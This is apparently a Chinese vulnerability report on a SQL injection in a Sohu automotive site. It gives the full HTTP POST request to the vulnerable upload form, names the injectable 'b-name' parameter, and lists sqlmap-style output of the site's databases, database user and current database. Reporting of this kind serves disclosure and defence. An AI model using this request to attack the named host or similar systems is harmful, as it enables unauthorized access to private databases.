搜狐某站MySQL注射（附验证脚本）

POST /baike_upload/handleForm.sip HTTP/1.1
 Host: db.auto.sohu.com
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Referer: http://db.auto.sohu.com/baike_upload/baike_update.sip?id=31
 Cookie: xxxx
 Connection: close
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 2130
 
 carPic=&b-name=%CD%A8%B7%E7%D7%F9%D2%CE&feeling=%09%26%23160%3B%A1%BE%CB%D1%BA%FC%C6%FB%B3%B5%A1%A1%C3%FB%B4%CA%BD%E2%CA%CD%A1%BF%CD%A8%B7%E7%D7%F9%D2%CE%A3%BA%D2%BB%D6%D6%C6%FB%B3%B5%BF%D5%B5%F7%CD%A8%B7%E7%D7%F9%D2%CE%A3%AC%CB%FC%B0%FC%C0%A8%D3%D0%D2%CE%D7%F9%BA%CD%BF%BF%B1%B3%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%C9%CF%B1%ED%C3%E6%D2%CE%CC%D7%CF%C2%B5%C4%D2%CE%D7%F9%C4%DA%C9%E8%D6%C3%D3%D0%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%A3%AC%D4%DA%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CF%C2%B2%BF%B5%C4%D7%F9%D2%CE%C4%DA%C9%E8%D6%C3%D3%D0%CF%F2%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CA%E4%CB%CD%BF%D5%B5%F7%B7%E7%B5%C4%D2%FD%B7%E7%BB%FA%A3%BB%D4%DA%BF%BF%B1%B3%B5%C4%C7%B0%B1%ED%C3%E6%BF%BF%B1%B3%CC%D7%BA%F3%B2%BF%B5%C4%BF%BF%B1%B3%C4%DA%C9%E8%D6%C3%D3%D0%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%A3%AC%D4%DA%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%BA%F3%B2%BF%B5%C4%BF%BF%B1%B3%C4%DA%C9%E8%D6%C3%D3%D0%CF%F2%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%CA%E4%CB%CD%BF%D5%B5%F7%B7%E7%B5%C4%D2%FD%B7%E7%BB%FA%A1%A3%CE%AA%C1%CB%CA%B9%D3%C3%B7%BD%B1%E3%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%B2%E0%B1%DA%C9%CF%C9%E8%D6%C3%D3%D0%BF%D8%D6%C6%D2%FD%B7%E7%BB%FA%B9%A4%D7%F7%D7%B4%CC%AC%B5%C4%CE%A2%B5%F7%BF%AA%B9%D8%A1%A3%CE%AA%C1%CB%CC%E1%B8%DF%CD%A8%B7%E7%D0%A7%B9%FB%A3%AC%D4%DA%D2%CE%D7%F9%B5%C4%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%C9%CF%B5%C4%D2%CE%CC%D7%B1%ED%C3%E6%C9%E8%D3%D0%D0%A1%B3%F6%C6%F8%BF%D7%A3%BB%D4%DA%BF%BF%B1%B3%B5%C4%B7%E4%B3%B2%CA%BD%B5%AF%C1%A6%CD%A8%B7%E7%B2%E3%B5%C4%BF%BF%B1%B3%CC%D7%B1%ED%C3%E6%C9%E8%D3%D0%D0%A1%B3%F6%C6%F8%BF%D7%A1%A3%B1%BE%CA%B5%D3%C3%D0%C2%D0%CD%B5%C4%D3%D0%D2%E6%D0%A7%B9%FB%CA%C7%A3%BA%BD%E1%B9%B9%BC%F2%B5%A5%A1%A2%CA%B9%D3%C3%B7%BD%B1%E3%A1%A2%B0%B2%D7%B0%BC%BC%CA%F5%BC%F2%B5%A5%A3%AC%C7%D2%B2%BB%C6%C6%BB%B5%C6%FB%B3%B5%D2%CE%D7%D3%BD%E1%B9%B9%D3%EB%CD%E2%B9%DB%A3%AC%C4%DC%B4%EF%B5%BD%BD%DA%C4%DC%BB%B7%B1%A3%CE%C0%C9%FA%B5%C4%B9%A6%C4%DC%A1%A3%0D%0A%0D%0A%09%0D%0A%09%09%0D%0A%09%09%09%0D%0A%09%09%09%09%0D%0A%09%09%0D%0A%09%09%0D%0A%09%09%09%0D%0A%09%09%09%09%26%23160%3B%0D%0A%09%09%0D%0A%09%0D%0A%0D%0A%0D%0A%0D%0A%09%26%23160%3B%0D%0A

注入参数#b-name

available databases [7]:
 [*] auto_bmw
 [*] auto_search
 [*] auto_warehouse
 [*] information_schema
 [*] sohu_priceinfo
 [*] tmp
 [*] usedcar

当前数据库用户：'%'

当前数据库：'auto_warehouse'